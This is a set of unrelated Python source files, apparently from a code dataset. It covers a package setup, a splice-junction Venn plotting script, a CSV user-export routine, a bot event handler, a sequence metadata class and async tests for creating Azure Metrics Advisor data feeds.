'Programming Language :: Python :: 3.8',
],
description="Utility tool for building Git branches my merging multiple other branches together.",
entry_points={
'console_scripts': [
'git-build-branch=git_build_branch.branch_builder:main',
'safe-commit-files=git_build_branch.safe_commit_files:main',
],
},
install_requires=requirements,
license="BSD license",
long_description=readme,
include_package_data=True,
keywords='git-build-branch',
name='git-build-branch',
packages=find_packages(include=['git_build_branch', 'git_build_branch.*']),
setup_requires=setup_requirements,
url='https://github.com/dimagi/git-build-branch',
version='0.1.13',
zip_safe=False,
)
| StarcoderdataPython |
5081528 | import pandas as pd
import argparse
from matplotlib_venn import venn3
import matplotlib.pyplot as plt
import math
def get_args():
desc = 'Given sj files, see which splice junctions are shared/unique between datasets'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-sj_1', dest='sj_1',
help = '1st splice junction file')
parser.add_argument('-sj_1_name', dest='sj_1_name',
help = '1st splice junction file sample name ie "Gencode"')
parser.add_argument('-sj_2', dest='sj_2',
help = '2nd splice junction file')
parser.add_argument('-sj_2_name', dest='sj_2_name',
help = '2nd splice junction file sample name ie "Gencode"')
parser.add_argument('-sj_3', dest='sj_3',
help = '3rd splice junction file')
parser.add_argument('-sj_3_name', dest='sj_3_name',
help = '3rd splice junction file sample name ie "Gencode"')
parser.add_argument('-sample', dest='sample_name',
help = 'Sample name ie "PacBio GM12878"')
parser.add_argument('--log', dest='log_sizes', default=False,
action='store_true', help = 'Log the sizes of the circles')
args = parser.parse_args()
return args
def read_sj_file(infile, dtype):
df = pd.read_csv(infile, sep='\t',
names=['chrom', 'start', 'stop', 'strand'], usecols=[0,1,2,3])
# df.drop_duplicates(inplace=True)
return df
def find_intersect_counts(dfa, dfb, dfc, args):
# intersection of all (a,b,c)
temp = pd.merge(dfa, dfb, how='inner', on=['chrom', 'start', 'stop', 'strand'])
temp = pd.merge(temp, dfc, how='inner', on=['chrom', 'start', 'stop', 'strand'])
count_abc = len(temp.index)
# intersection of (a,b)
temp = pd.merge(dfa, dfb, how='inner', on=['chrom', 'start', 'stop', 'strand'])
count_ab = len(temp.index) - count_abc
# intersection of (a,c)
temp = pd.merge(dfa, dfc, how='inner', on=['chrom', 'start', 'stop', 'strand'])
count_ac = len(temp.index) - count_abc
# intersection of (b,c)
temp = pd.merge(dfb, dfc, how='inner', on=['chrom', 'start', 'stop', 'strand'])
count_bc = len(temp.index) - count_abc
# just a
count_a = len(dfa.index) - count_ab - count_ac - count_abc
# just b
count_b = len(dfb.index) - count_ab - count_bc - count_abc
# just c
count_c = len(dfc.index) - count_ac - count_bc - count_abc
counts = (count_a, count_b, count_ab, count_c, count_ac, count_bc, count_abc)
labels = (args.sj_1_name, args.sj_2_name, args.sj_3_name)
return counts, labels
def main():
args = get_args()
# read in each of the sj dfs
pb_df = read_sj_file(args.sj_1, args.sj_1_name)
print(pb_df.head())
print('long-read df')
print(len(pb_df.index))
ont_df = read_sj_file(args.sj_2, args.sj_2_name)
print(ont_df.head())
print(len(ont_df.index))
ill_df = read_sj_file(args.sj_3, args.sj_3_name)
print(ill_df.head())
print(len(ill_df.index))
# get each of the intersection counts that we care about
counts, labels = find_intersect_counts(pb_df, ont_df, ill_df, args)
# change circle sizes
if args.log_sizes:
intersection_labels = tuple([str(i) for i in counts])
counts = tuple([math.log2(i) for i in counts])
print(counts)
print(labels)
# plot the venn diagram
plt.figure(figsize=(8.5,8.5))
v = venn3(subsets=counts, set_labels=('A', 'B', 'C'))
# messing with label text
v.get_label_by_id('A').set_text(args.sj_1_name)
v.get_label_by_id('B').set_text(args.sj_2_name)
v.get_label_by_id('C').set_text(args.sj_3_name)
v.get_label_by_id('A').set_fontsize('x-large')
v.get_label_by_id('B').set_fontsize('x-large')
v.get_label_by_id('C').set_fontsize('x-large')
plt.title('{} Splice Junction Support'.format(args.sample_name), fontsize='xx-large')
# messing with numerical text
v.get_label_by_id('100').set_fontsize('x-large')
v.get_label_by_id('010').set_fontsize('x-large')
v.get_label_by_id('001').set_fontsize('x-large')
v.get_label_by_id('110').set_fontsize('x-large')
v.get_label_by_id('101').set_fontsize('x-large')
v.get_label_by_id('011').set_fontsize('x-large')
v.get_label_by_id('111').set_fontsize('x-large')
if args.log_sizes:
v.get_label_by_id('100').set_text(intersection_labels[0])
v.get_label_by_id('010').set_text(intersection_labels[1])
v.get_label_by_id('001').set_text(intersection_labels[3])
v.get_label_by_id('110').set_text(intersection_labels[2])
v.get_label_by_id('101').set_text(intersection_labels[4])
v.get_label_by_id('011').set_text(intersection_labels[5])
v.get_label_by_id('111').set_text(intersection_labels[6])
plt.savefig('figures/'+args.sample_name.replace(' ','_')+'_venn.pdf')
plt.savefig('figures/'+args.sample_name.replace(' ','_')+'_venn.png', dpi = 600)
if __name__ == '__main__':
main()
| StarcoderdataPython |
6532727 | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
import logging
import os
from sis_provisioner.dao.pws import get_person
from sis_provisioner.dao.hrp import get_worker
from sis_provisioner.util.log import log_exception
from sis_provisioner.util.settings import (
get_csv_file_name_prefix, get_csv_file_size)
from sis_provisioner.csv import get_aline_csv, open_file
from sis_provisioner.csv.user_formatter import get_attr_list, get_headers
logger = logging.getLogger(__name__)
def get_user_file_name(filepath, index):
return os.path.join(filepath,
get_csv_file_name_prefix() + str(index) + '.csv')
def make_import_user_csv_files(uw_accounts,
filepath):
"""
:param uw_accounts: a list of UwAccount objects
Writes all csv files. Returns number of records wrote out.
"""
if not uw_accounts or len(uw_accounts) == 0:
return 0
file_size = get_csv_file_size()
total_users = len(uw_accounts)
f_index = 1
user_number = 0
csv_headers = get_aline_csv(get_headers())
f = open_file(get_user_file_name(filepath, f_index))
f.write(csv_headers)
for uw_account in uw_accounts:
if uw_account.disabled or uw_account.has_terminate_date():
continue
person = get_person(uw_account.netid)
if (person is None or person.is_test_entity or
not person.is_emp_state_current()):
continue
if person.uwnetid != uw_account.netid:
logger.error("OLD netid, Skip {0}".format(uw_account))
continue
aline = get_aline_csv(get_attr_list(person, get_worker(person)))
try:
f.write(aline)
except Exception:
log_exception(
logger,
"{0:d}th file: ({1}), Skip!".format(f_index, aline),
traceback.format_exc())
continue
user_number += 1
if user_number < total_users and (user_number % file_size) == 0:
f.close()
logger.info("Finish writing {0:d} entries.".format(user_number))
f_index += 1
f = open_file(get_user_file_name(filepath, f_index))
f.write(csv_headers)
f.close()
logger.info("Finish writing {0:d} entries.".format(user_number))
return user_number
| StarcoderdataPython |
3253745 | from vk.types.events.community.events_list import Event
from vk.bot_framework.dispatcher.rule import BaseRule
from vk import types
import typing
import logging
import asyncio
logger = logging.getLogger(__name__)
class SkipHandler(Exception):
pass
class Handler:
def __init__(
self, event_type: Event, handler: typing.Callable, rules: typing.List[BaseRule]
):
self.event_type: Event = event_type
self.handler: typing.Callable = handler
self.rules: typing.List[BaseRule] = rules
async def execute_handler(self, *args):
# args - (event, data)
if self.rules:
_execute = False
for rule in self.rules:
result = await rule(args[0])
if not result:
_execute = False
break
_execute = True
if _execute:
await self.handler(*args)
return True
else:
await self.handler(*args)
return True
| StarcoderdataPython |
3242288 | <reponame>RosettaCommons/jade2<filename>jade2/basic/sequence/SequenceInfo.py
#<NAME>
class SequenceInfo:
"""
Simple class for holding + accessing sequence metadata
Original class for sequence info. Basically deprecated by SequenceStats and PDBConsensusInfo.
"""
def __init__(self):
self.start = None
self.end = None
self.chain = None
self.sequence = None
self.region = None
self.pdbid = None
self.pdbpath = None
def get_sequence(self):
return self.sequence
def get_length(self):
return len(self.sequence)
def get_pdbID(self):
return self.pdbID
def get_pdbpath(self):
return self.pdbpath
def get_region(self):
return self.region
def get_start_residue(self):
return self.start
def get_end_residue(self):
return self.end
def get_chain(self):
return self.chain
def get_residue(self, resnum):
"""
If region is given, resnum is residue number of PDB
If not, resnum in Rosetta resnum
"""
print(self.sequence)
print(repr(resnum))
if self.start:
index_num = resnum-self.start
one_letter_code = self.sequence[index_num]
else:
one_letter_code = self.sequence[resnum-1]
return one_letter_code
def set_sequence(self, sequence):
self.sequence = sequence
def set_pdbID(self, pdbID):
self.pdbID = pdbID
def set_pdbpath(self, pdbpath):
self.pdbpath = pdbpath
def set_region(self, region):
self.region = region
rSP = region.split(":")
self.start = int(rSP[0])
self.end = int(rSP[1])
self.chain = rSP[2]
| StarcoderdataPython |
194201 | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import datetime
from dateutil.tz import tzutc
import unittest
import pytest
from devtools_testutils import AzureTestCase
from azure.core.exceptions import ResourceNotFoundError
from azure.ai.metricsadvisor.models import (
SqlServerDataFeedSource,
AzureTableDataFeedSource,
AzureBlobDataFeedSource,
AzureCosmosDbDataFeedSource,
DataFeedMetric,
DataFeedDimension,
DataFeedSchema,
DataFeedIngestionSettings,
DataFeedGranularity,
DataFeedMissingDataPointFillSettings,
DataFeedRollupSettings,
AzureApplicationInsightsDataFeedSource,
AzureDataExplorerDataFeedSource,
InfluxDbDataFeedSource,
AzureDataLakeStorageGen2DataFeedSource,
MongoDbDataFeedSource,
MySqlDataFeedSource,
PostgreSqlDataFeedSource,
)
from base_testcase_async import TestMetricsAdvisorAdministrationClientBaseAsync
class TestMetricsAdvisorAdministrationClientAsync(TestMetricsAdvisorAdministrationClientBaseAsync):
@AzureTestCase.await_prepared_test
async def test_create_simple_data_feed(self):
data_feed_name = self.create_random_name("testfeed")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=data_feed_name,
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query="select * from adsample2 where Timestamp = @StartTime"
),
granularity="Daily",
schema=["cost", "revenue"],
ingestion_settings=datetime.datetime(2019, 10, 1)
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "SqlServer")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.granularity.granularity_type, "Daily")
self.assertEqual(data_feed.schema.metrics[0].name, "cost")
self.assertEqual(data_feed.schema.metrics[1].name, "revenue")
self.assertEqual(data_feed.ingestion_settings.ingestion_begin_time,
datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_from_sql_server(self):
data_feed_name = self.create_random_name("testfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=data_feed_name,
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admin_emails=["<EMAIL>"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="SmartFilling"
),
rollup_settings=DataFeedRollupSettings(
rollup_type="NoRollup",
rollup_method="None",
),
viewer_emails=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "SqlServer")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.granularity.granularity_type, "Daily")
self.assertEqual(data_feed.granularity.custom_granularity_value, None)
self.assertEqual(data_feed.schema.metrics[0].name, "cost")
self.assertEqual(data_feed.schema.metrics[1].name, "revenue")
self.assertEqual(data_feed.schema.metrics[0].display_name, "display cost")
self.assertEqual(data_feed.schema.metrics[1].display_name, "display revenue")
self.assertEqual(data_feed.schema.metrics[0].description, "the cost")
self.assertEqual(data_feed.schema.metrics[1].description, "the revenue")
self.assertEqual(data_feed.schema.dimensions[0].name, "category")
self.assertEqual(data_feed.schema.dimensions[1].name, "city")
self.assertEqual(data_feed.schema.dimensions[0].display_name, "display category")
self.assertEqual(data_feed.schema.dimensions[1].display_name, "display city")
self.assertEqual(data_feed.ingestion_settings.ingestion_begin_time,
datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
self.assertEqual(data_feed.ingestion_settings.data_source_request_concurrency, 0)
self.assertEqual(data_feed.ingestion_settings.ingestion_retry_delay, -1)
self.assertEqual(data_feed.ingestion_settings.ingestion_start_offset, -1)
self.assertEqual(data_feed.ingestion_settings.stop_retry_after, -1)
self.assertIn("<EMAIL>", data_feed.admin_emails)
self.assertEqual(data_feed.data_feed_description, "my first data feed")
self.assertEqual(data_feed.missing_data_point_fill_settings.fill_type, "SmartFilling")
self.assertEqual(data_feed.rollup_settings.rollup_type, "NoRollup")
self.assertEqual(data_feed.rollup_settings.rollup_method, "None")
self.assertEqual(data_feed.viewer_emails, ["viewers"])
self.assertEqual(data_feed.access_mode, "Private")
self.assertEqual(data_feed.action_link_template, "action link template")
self.assertEqual(data_feed.status, "Active")
self.assertTrue(data_feed.is_admin)
self.assertIsNotNone(data_feed.metric_ids)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
with self.assertRaises(ResourceNotFoundError):
await self.admin_client.get_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_from_sql_server_with_custom_values(self):
data_feed_name = self.create_random_name("testfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=data_feed_name,
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Custom",
custom_granularity_value=20
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admin_emails=["<EMAIL>"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="CustomValue",
custom_fill_value=10
),
rollup_settings=DataFeedRollupSettings(
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup"
),
viewer_emails=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "SqlServer")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.granularity.granularity_type, "Custom")
self.assertEqual(data_feed.granularity.custom_granularity_value, 20)
self.assertEqual(data_feed.schema.metrics[0].name, "cost")
self.assertEqual(data_feed.schema.metrics[1].name, "revenue")
self.assertEqual(data_feed.schema.metrics[0].display_name, "display cost")
self.assertEqual(data_feed.schema.metrics[1].display_name, "display revenue")
self.assertEqual(data_feed.schema.metrics[0].description, "the cost")
self.assertEqual(data_feed.schema.metrics[1].description, "the revenue")
self.assertEqual(data_feed.schema.dimensions[0].name, "category")
self.assertEqual(data_feed.schema.dimensions[1].name, "city")
self.assertEqual(data_feed.schema.dimensions[0].display_name, "display category")
self.assertEqual(data_feed.schema.dimensions[1].display_name, "display city")
self.assertEqual(data_feed.ingestion_settings.ingestion_begin_time,
datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
self.assertEqual(data_feed.ingestion_settings.data_source_request_concurrency, 0)
self.assertEqual(data_feed.ingestion_settings.ingestion_retry_delay, -1)
self.assertEqual(data_feed.ingestion_settings.ingestion_start_offset, -1)
self.assertEqual(data_feed.ingestion_settings.stop_retry_after, -1)
self.assertIn("<EMAIL>", data_feed.admin_emails)
self.assertEqual(data_feed.data_feed_description, "my first data feed")
self.assertEqual(data_feed.missing_data_point_fill_settings.fill_type, "CustomValue")
self.assertEqual(data_feed.missing_data_point_fill_settings.custom_fill_value, 10)
self.assertEqual(data_feed.rollup_settings.rollup_type, "AlreadyRollup")
self.assertEqual(data_feed.rollup_settings.rollup_method, "Sum")
self.assertEqual(data_feed.rollup_settings.rollup_identification_value, "sumrollup")
self.assertEqual(data_feed.viewer_emails, ["viewers"])
self.assertEqual(data_feed.access_mode, "Private")
self.assertEqual(data_feed.action_link_template, "action link template")
self.assertEqual(data_feed.status, "Active")
self.assertTrue(data_feed.is_admin)
self.assertIsNotNone(data_feed.metric_ids)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
with self.assertRaises(ResourceNotFoundError):
await self.admin_client.get_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_azure_table(self):
name = self.create_random_name("tablefeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureTableDataFeedSource(
connection_string=self.azure_table_connection_string,
query="PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'",
table="adsample"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureTable")
self.assertEqual(data_feed.source.table, "adsample")
self.assertEqual(data_feed.source.query, "PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_azure_blob(self):
name = self.create_random_name("blobfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureBlobDataFeedSource(
connection_string=self.azure_blob_connection_string,
container="adsample",
blob_template="%Y/%m/%d/%h/JsonFormatV2.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureBlob")
self.assertEqual(data_feed.source.container, "adsample")
self.assertEqual(data_feed.source.blob_template, "%Y/%m/%d/%h/JsonFormatV2.json")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_azure_cosmos_db(self):
name = self.create_random_name("cosmosfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureCosmosDbDataFeedSource(
connection_string=self.azure_cosmosdb_connection_string,
sql_query="'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'",
database="adsample",
collection_id="adsample"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureCosmosDB")
self.assertEqual(data_feed.source.database, "adsample")
self.assertEqual(data_feed.source.collection_id, "adsample")
self.assertEqual(data_feed.source.sql_query, "'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_application_insights(self):
name = self.create_random_name("applicationinsightsasync")
async with self.admin_client:
try:
query = "let gran=60m; let starttime=datetime(@StartTime); let endtime=starttime + gran; requests | " \
"where timestamp >= starttime and timestamp < endtime | summarize request_count = count(), " \
"duration_avg_ms = avg(duration), duration_95th_ms = percentile(duration, 95), " \
"duration_max_ms = max(duration) by resultCode"
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureApplicationInsightsDataFeedSource(
azure_cloud="Azure",
application_id="3706fe8b-98f1-47c7-bf69-b73b6e53274d",
api_key=self.application_insights_api_key,
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2020, 7, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureApplicationInsights")
self.assertEqual(data_feed.source.application_id, "3706fe8b-98f1-47c7-bf69-b73b6e53274d")
self.assertIsNotNone(data_feed.source.query)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_data_explorer(self):
name = self.create_random_name("azuredataexplorerasync")
async with self.admin_client:
try:
query = "let StartDateTime = datetime(@StartTime); let EndDateTime = StartDateTime + 1d; " \
"adsample | where Timestamp >= StartDateTime and Timestamp < EndDateTime"
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureDataExplorerDataFeedSource(
connection_string=self.azure_data_explorer_connection_string,
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureDataExplorer")
self.assertEqual(data_feed.source.query, query)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_influxdb(self):
name = self.create_random_name("influxdbasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=InfluxDbDataFeedSource(
connection_string=self.influxdb_connection_string,
database="adsample",
user_name="adreadonly",
password=self.influxdb_password,
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "InfluxDB")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.source.database, "adsample")
self.assertEqual(data_feed.source.user_name, "adreadonly")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_datalake(self):
name = self.create_random_name("datalakeasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureDataLakeStorageGen2DataFeedSource(
account_name="adsampledatalakegen2",
account_key=self.azure_datalake_account_key,
file_system_name="adsample",
directory_template="%Y/%m/%d",
file_template="adsample.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="Cost"),
DataFeedMetric(name="revenue", display_name="Revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="Category"),
DataFeedDimension(name="city", display_name="City")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureDataLakeStorageGen2")
self.assertEqual(data_feed.source.account_name, "adsampledatalakegen2")
self.assertEqual(data_feed.source.file_system_name, "adsample")
self.assertEqual(data_feed.source.directory_template, "%Y/%m/%d")
self.assertEqual(data_feed.source.file_template, "adsample.json")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_mongodb(self):
name = self.create_random_name("mongodbasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=MongoDbDataFeedSource(
connection_string=self.mongodb_connection_string,
database="adsample",
command='{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000,}'
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "MongoDB")
self.assertEqual(data_feed.source.database, "adsample")
self.assertEqual(data_feed.source.command, '{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000,}')
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_mysql(self):
name = self.create_random_name("mysqlasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=MySqlDataFeedSource(
connection_string=self.mysql_connection_string,
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "MySql")
self.assertEqual(data_feed.source.query, "'select * from adsample2 where Timestamp = @StartTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_postgresql(self):
name = self.create_random_name("postgresqlasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=PostgreSqlDataFeedSource(
connection_string=self.postgresql_connection_string,
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "PostgreSql")
self.assertEqual(data_feed.source.query, "'select * from adsample2 where Timestamp = @StartTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_list_data_feeds(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds()
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_data_feed_name(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds(data_feed_name="azsqlDatafeed")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) == 1
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_status(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds(status="Paused")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) == 0
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_source_type(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds(data_source_type="SqlServer")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_granularity_type(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds(granularity_type="Daily")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@unittest.skip("skip test")
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_skip(self):
async with self.admin_client:
all_feeds = self.admin_client.list_data_feeds()
